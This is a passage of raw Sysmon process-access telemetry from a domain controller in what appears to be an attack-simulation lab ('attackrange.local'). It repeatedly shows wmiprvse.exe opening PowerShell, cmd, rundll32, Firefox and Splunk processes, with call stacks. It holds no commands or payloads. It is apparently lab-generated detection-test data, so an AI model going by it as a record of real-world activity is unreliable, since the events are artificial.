indows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002242469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:42.858{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532\PSHost.132591776826986411.7532.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002242468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.d